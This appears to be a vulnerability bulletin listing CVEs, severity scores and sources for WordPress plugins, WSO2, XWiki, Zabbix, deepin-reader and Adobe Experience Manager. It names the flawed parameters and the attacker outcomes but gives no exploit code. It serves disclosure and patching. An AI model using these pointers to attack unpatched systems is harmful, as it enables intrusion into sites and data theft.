wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in AdFoxly AdFoxly – Ad Manager, AdSense Ads & Ads.Txt. This issue affects AdFoxly – Ad Manager, AdSense Ads & Ads.Txt: from n/a through 1.8.5. 2023-12-18 8.8 CVE-2023-46617
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Master slider Master Slider Pro allows SQL Injection. This issue affects Master Slider Pro: from n/a through 3.6.5. 2023-12-18 8.8 CVE-2023-47506
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 2.0.3. 2023-12-18 8.8 CVE-2023-47787
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Canada Post Shipping Method. This issue affects Canada Post Shipping Method: from n/a through 2.8.3. 2023-12-18 8.8 CVE-2023-47789
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Saint Systems Disable User Login. This issue affects Disable User Login: from n/a through 1.3.7. 2023-12-18 8.8 CVE-2023-47806
audit@patchstack.com
wordpress — wordpress Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Roland Barker, xnau webdesign Participants Database allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects Participants Database: from n/a through 2.5.5. 2023-12-19 8.8 CVE-2023-48751
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.4. 2023-12-18 8.8 CVE-2023-48755
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Crocoblock JetElements For Elementor. This issue affects JetElements For Elementor: from n/a through 2.6.13. 2023-12-18 8.8 CVE-2023-48762
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in SVGator SVGator – Add Animated SVG Easily. This issue affects SVGator – Add Animated SVG Easily: from n/a through 1.2.4. 2023-12-18 8.8 CVE-2023-48766
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in CodeAstrology Team Quantity Plus Minus Button for WooCommerce by CodeAstrology. This issue affects Quantity Plus Minus Button for WooCommerce by CodeAstrology: from n/a through 1.1.9. 2023-12-18 8.8 CVE-2023-48768
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Blue Coral Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back. This issue affects Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back: from n/a through 2.3. 2023-12-18 8.8 CVE-2023-48769
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Arul Prasad J Prevent Landscape Rotation. This issue affects Prevent Landscape Rotation: from n/a through 2.0. 2023-12-18 8.8 CVE-2023-48772
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WP Doctor WooCommerce Login Redirect. This issue affects WooCommerce Login Redirect: from n/a through 2.2.4. 2023-12-18 8.8 CVE-2023-48773
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in VillaTheme Product Size Chart For WooCommerce. This issue affects Product Size Chart For WooCommerce: from n/a through 1.1.5. 2023-12-18 8.8 CVE-2023-48778
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Marketing Rapel MkRapel Regiones y Ciudades de Chile para WC. This issue affects MkRapel Regiones y Ciudades de Chile para WC: from n/a through 4.3.0. 2023-12-18 8.8 CVE-2023-48781
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Saiful Islam Add to Cart Text Changer and Customize Button, Add Custom Icon. This issue affects Add to Cart Text Changer and Customize Button, Add Custom Icon: from n/a through 2.0. 2023-12-18 8.8 CVE-2023-49153
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Button Generator – easily Button Builder. This issue affects Button Generator – easily Button Builder: from n/a through 2.3.8. 2023-12-18 8.8 CVE-2023-49155
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.5. 2023-12-18 8.8 CVE-2023-49163
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in OceanWP Ocean Extra. This issue affects Ocean Extra: from n/a through 2.2.2. 2023-12-19 8.8 CVE-2023-49164
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Apasionados, Apasionados del Marketing, NetConsulting DoFollow Case by Case. This issue affects DoFollow Case by Case: from n/a through 3.4.2. 2023-12-15 8.8 CVE-2023-49197
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce. This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through 2.21.3. 2023-12-15 8.8 CVE-2023-49744
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in SureTriggers SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!. This issue affects SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!: from n/a through 1.0.23. 2023-12-15 8.8 CVE-2023-49749
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Ciprian Popescu Block for Font Awesome. This issue affects Block for Font Awesome: from n/a through 1.4.0. 2023-12-17 8.8 CVE-2023-49751
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team WooDiscuz – WooCommerce Comments. This issue affects WooDiscuz – WooCommerce Comments: from n/a through 2.3.0. 2023-12-18 8.8 CVE-2023-49759
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Giannopoulos Kostas WPsoonOnlinePage. This issue affects WPsoonOnlinePage: from n/a through 1.9. 2023-12-18 8.8 CVE-2023-49760
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Gravity Master Product Enquiry for WooCommerce. This issue affects Product Enquiry for WooCommerce: from n/a through 3.0. 2023-12-18 8.8 CVE-2023-49761
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Creatomatic Ltd CSprite. This issue affects CSprite: from n/a through 1.1. 2023-12-18 8.8 CVE-2023-49763
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in SoftLab Integrate Google Drive. This issue affects Integrate Google Drive: from n/a through 1.3.4. 2023-12-17 8.8 CVE-2023-49769
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer. This issue affects CSV Importer: from n/a through 0.3.8. 2023-12-17 8.8 CVE-2023-49775
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Innovative Solutions Fix My Feed RSS Repair. This issue affects Fix My Feed RSS Repair: from n/a through 1.4. 2023-12-17 8.8 CVE-2023-49816
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in PixelYourSite Product Catalog Feed by PixelYourSite. This issue affects Product Catalog Feed by PixelYourSite: from n/a through 2.1.1. 2023-12-17 8.8 CVE-2023-49824
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in realmag777 FOX – Currency Switcher Professional for WooCommerce. This issue affects FOX – Currency Switcher Professional for WooCommerce: from n/a through 1.4.1.4. 2023-12-17 8.8 CVE-2023-49834
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Palscode Multi Currency For WooCommerce. This issue affects Multi Currency For WooCommerce: from n/a through 1.5.5. 2023-12-18 8.8 CVE-2023-49840
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in QuanticEdge First Order Discount Woocommerce. This issue affects First Order Discount Woocommerce: from n/a through 1.21. 2023-12-18 8.8 CVE-2023-49843
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Kevin Ohashi WPPerformanceTester. This issue affects WPPerformanceTester: from n/a through 2.0.0. 2023-12-18 8.8 CVE-2023-49844
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in PayTR Ödeme ve Elektronik Para Kurulu?u A.?. PayTR Taksit Tablosu – WooCommerce. This issue affects PayTR Taksit Tablosu – WooCommerce: from n/a through 1.3.1. 2023-12-18 8.8 CVE-2023-49853
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Tribe Interactive Caddy – Smart Side Cart for WooCommerce. This issue affects Caddy – Smart Side Cart for WooCommerce: from n/a through 1.9.7. 2023-12-18 8.8 CVE-2023-49854
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in BinaryCarpenter Menu Bar Cart Icon For WooCommerce By Binary Carpenter. This issue affects Menu Bar Cart Icon For WooCommerce By Binary Carpenter: from n/a through 1.49.3. 2023-12-18 8.8 CVE-2023-49855
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Hiroaki Miyashita Custom Post Type Page Template. This issue affects Custom Post Type Page Template: from n/a through 1.1. 2023-12-18 8.8 CVE-2023-50372
audit@patchstack.com
wordpress — wordpress The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution. 2023-12-18 8.8 CVE-2023-5882
contact@wpscan.com
wordpress — wordpress The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution. 2023-12-18 8.8 CVE-2023-5886
contact@wpscan.com
wordpress — wordpress The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the ‘ajaxUploadFonts’ function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site’s server which may make remote code execution possible. 2023-12-15 8.8 CVE-2023-6827
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the ‘content-dir’ HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server’s php.ini is configured with ‘allow_url_include’ set to ‘on’. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP. 2023-12-23 8.1 CVE-2023-6971
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Widget Settings Importer/Exporter Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp_ajax_import_widget_dataparameter AJAX action in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-23 7.4 CVE-2020-36769
security@wordfence.com
security@wordfence.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in weDevs Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy. This issue affects Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.12. 2023-12-20 7.1 CVE-2023-26525
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Page Visit Counter Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress. This issue affects Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress: from n/a through 6.4.2. 2023-12-20 7.1 CVE-2023-28788
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in BannerSky BSK Forms Blacklist. This issue affects BSK Forms Blacklist: from n/a through 3.6.2. 2023-12-20 7.6 CVE-2023-30872
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Adastra Crypto Cryptocurrency Payment & Donation Box – Accept Payments in any Cryptocurrency on your WP Site for Free. This issue affects Cryptocurrency Payment & Donation Box – Accept Payments in any Cryptocurrency on your WP Site for Free: from n/a through 2.2.7. 2023-12-20 7.2 CVE-2023-32128
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 5.7.1. 2023-12-20 7.6 CVE-2023-32743
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WooCommerce Product Vendors allows SQL Injection. This issue affects Product Vendors: from n/a through 2.1.76. 2023-12-18 7.2 CVE-2023-33331
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce Woo Subscriptions. This issue affects Woo Subscriptions: from n/a through 5.1.2. 2023-12-20 7.5 CVE-2023-35914
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0. 2023-12-20 7.6 CVE-2023-35915
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0. 2023-12-20 7.5 CVE-2023-35916
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in MainWP MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance. This issue affects MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance: from n/a through 4.4.3.3. 2023-12-20 7.6 CVE-2023-38519
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5. 2023-12-20 7.4 CVE-2023-46147
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in E2Pdf.Com E2Pdf – Export To Pdf Tool for WordPress. This issue affects E2Pdf – Export To Pdf Tool for WordPress: from n/a through 1.20.18. 2023-12-19 7.2 CVE-2023-46154
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Avirtum iPages Flipbook For WordPress. This issue affects iPages Flipbook For WordPress: from n/a through 1.4.8. 2023-12-20 7.6 CVE-2023-47236
audit@patchstack.com
wordpress — wordpress The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not validate and sanitize the `wp_query` parameter which allows an attacker to run arbitrary command on the remote server 2023-12-18 7.2 CVE-2023-4724
contact@wpscan.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WPVibes Redirect 404 Error Page to Homepage or Custom Page with Logs allows SQL Injection. This issue affects Redirect 404 Error Page to Homepage or Custom Page with Logs: from n/a through 1.8.7. 2023-12-18 7.2 CVE-2023-47530
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Link Whisper Link Whisper Free. This issue affects Link Whisper Free: from n/a through 0.6.5. 2023-12-20 7.2 CVE-2023-47852
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP. This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.1. 2023-12-21 7.5 CVE-2023-48288
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WC Vendors WC Vendors – WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors. This issue affects WC Vendors – WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors: from n/a through 2.4.7. 2023-12-19 7.6 CVE-2023-48327
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in QuantumCloud AI ChatBot. This issue affects AI ChatBot: from n/a through 4.7.8. 2023-12-19 7.2 CVE-2023-48741
audit@patchstack.com
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv. This issue affects CommentLuv: from n/a through 3.0.4. 2023-12-15 7.5 CVE-2023-49159
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Younes JFR. Advanced Database Cleaner. This issue affects Advanced Database Cleaner: from n/a through 3.1.2. 2023-12-19 7.2 CVE-2023-49764
audit@patchstack.com
wordpress — wordpress The SmartCrawl WordPress plugin before 3.8.3 does not prevent unauthorized users from accessing password-protected posts’ content. 2023-12-18 7.5 CVE-2023-5949
contact@wpscan.com
wordpress — wordpress The Events Calendar WordPress plugin before 6.2.8.1 discloses the content of password protected posts to unauthenticated users via a crafted request 2023-12-18 7.5 CVE-2023-6203
contact@wpscan.com
wordpress — wordpress IThe Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks 2023-12-18 7.2 CVE-2023-6222
contact@wpscan.com
contact@wpscan.com
wordpress — wordpress The SiteOrigin Widgets Bundle WordPress plugin before 1.51.0 does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites. 2023-12-18 7.2 CVE-2023-6295
contact@wpscan.com
wordpress — wordpress The E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the ‘import_action’ function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site’s server which may make remote code execution possible. 2023-12-15 7.2 CVE-2023-6826
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the ‘content-backups’ and ‘content-name’, ‘content-manifest’, or ‘content-bmitmp’ and ‘content-identy’ HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. 2023-12-23 7.5 CVE-2023-6972
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to OS Command Injection in all versions up to, and including, 1.3.9 via the ‘url’ parameter. This vulnerability allows authenticated attackers, with administrator-level permissions and above, to execute arbitrary commands on the host operating system. 2023-12-23 7.2 CVE-2023-7002
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 		 Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.50. 2023-12-20 8.5 CVE-2023-33330
audit@patchstack.com
wordpress — wordpress
 		 Deserialization of Untrusted Data vulnerability in Rajnish Arora Recently Viewed Products. This issue affects Recently Viewed Products: from n/a through 1.0.0. 2023-12-19 8.3 CVE-2023-34027
audit@patchstack.com
wordpress — wordpress
 		 Unrestricted Upload of File with Dangerous Type vulnerability in ThemePunch OHG Slider Revolution. This issue affects Slider Revolution: from n/a through 6.6.15. 2023-12-20 8.4 CVE-2023-47784
audit@patchstack.com
wordpress — wordpress
 		 Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1. 2023-12-20 8.5 CVE-2023-49825
audit@patchstack.com
wordpress — wordpress
 		 Deserialization of Untrusted Data vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1. 2023-12-21 8.1 CVE-2023-49826
audit@patchstack.com
wordpress — wordpress
 		 Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in GuardGiant Brute Force Protection WordPress Brute Force Protection – Stop Brute Force Attacks. This issue affects WordPress Brute Force Protection – Stop Brute Force Attacks: from n/a through 2.2.5. 2023-12-19 7.6 CVE-2023-48764
audit@patchstack.com
wordpress — wordpress
 		 Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Guelben Bravo Translate. This issue affects Bravo Translate: from n/a through 1.2. 2023-12-20 7.6 CVE-2023-49161
audit@patchstack.com
wordpress — wordpress
 		 Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Magic Logix MSync. This issue affects MSync: from n/a through 1.0.0. 2023-12-20 7.6 CVE-2023-49166
audit@patchstack.com
wordpress — wordpress
 		 Deserialization of Untrusted Data vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc. This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3. 2023-12-19 7.5 CVE-2023-49819
audit@patchstack.com
wso2 — multiple_products Multiple WSO2 products have been identified as vulnerable to perform user impersonation using JIT provisioning. In order for this vulnerability to have any impact on your deployment, following conditions must be met: * An IDP configured for federated authentication and JIT provisioning enabled with the “Prompt for username, password and consent” option. * A service provider that uses the above IDP for federated authentication and has the “Assert identity using mapped local subject identifier” flag enabled. Attacker should have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP. When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation. 2023-12-15 8.5 CVE-2023-6837
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — multiple_products Multiple WSO2 products have been identified as vulnerable due to an XML External Entity (XXE) attack abuses a widely available but rarely used feature of XML parsers to access sensitive information. 2023-12-15 7.5 CVE-2023-6836
ed10eef1-636d-4fbe-9993-6890dfa878f8
wuhan_deepin_technology_co.,_ltd. — deepin-reader Deepin Linux’s default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue. 2023-12-22 9.3 CVE-2023-50254
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki — xwiki XWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn’t properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user’s profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be applied manually applied to the page `XWiki.SearchAdmin`. 2023-12-15 8.8 CVE-2023-50721
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki — xwiki XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn’t require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`. 2023-12-15 8.8 CVE-2023-50722
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki — xwiki XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the `XWiki.ConfigurableClassMacros` and `XWiki.ConfigurableClass` pages. 2023-12-15 8.8 CVE-2023-50723
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki — xwiki XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It’s possible to execute a Velocity script without script right through the document tree. This has been patched in XWiki 14.10.7 and 15.2RC1. 2023-12-21 8.3 CVE-2023-50732
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki — xwiki XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren’t accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability. 2023-12-15 7.5 CVE-2023-50719
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
zabbix — zabbix-agent The vulnerability is caused by improper check for check if RDLENGTH does not overflow the buffer in response from DNS server. 2023-12-18 8.1 CVE-2023-32726
security@zabbix.com
zabbix — zabbix-agent2 The Zabbix Agent 2 item key smart.disk.get does not sanitize its parameters before passing them to a shell command resulting possible vulnerability for remote code execution. 2023-12-18 9.8 CVE-2023-32728
security@zabbix.com
zabbix — zabbix_server The website configured in the URL widget will receive a session cookie when testing or executing scheduled reports. The received session cookie can then be used to access the frontend as the particular user. 2023-12-18 8.8 CVE-2023-32725
security@zabbix.com
zabbix — zabbix_server An attacker who has the privilege to configure Zabbix items can use function icmpping() with additional malicious command inside it to execute arbitrary code on the current Zabbix server. 2023-12-18 7.2 CVE-2023-32727
security@zabbix.com

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-47064
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-47065
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48440
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Access Control vulnerability. An attacker could leverage this vulnerability to achieve a low-confidentiality impact within the application. Exploitation of this issue does not require user interaction. 2023-12-15 5.3 CVE-2023-48441
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48442
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48443
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48444
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48445
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48446
psirt@adobe.com
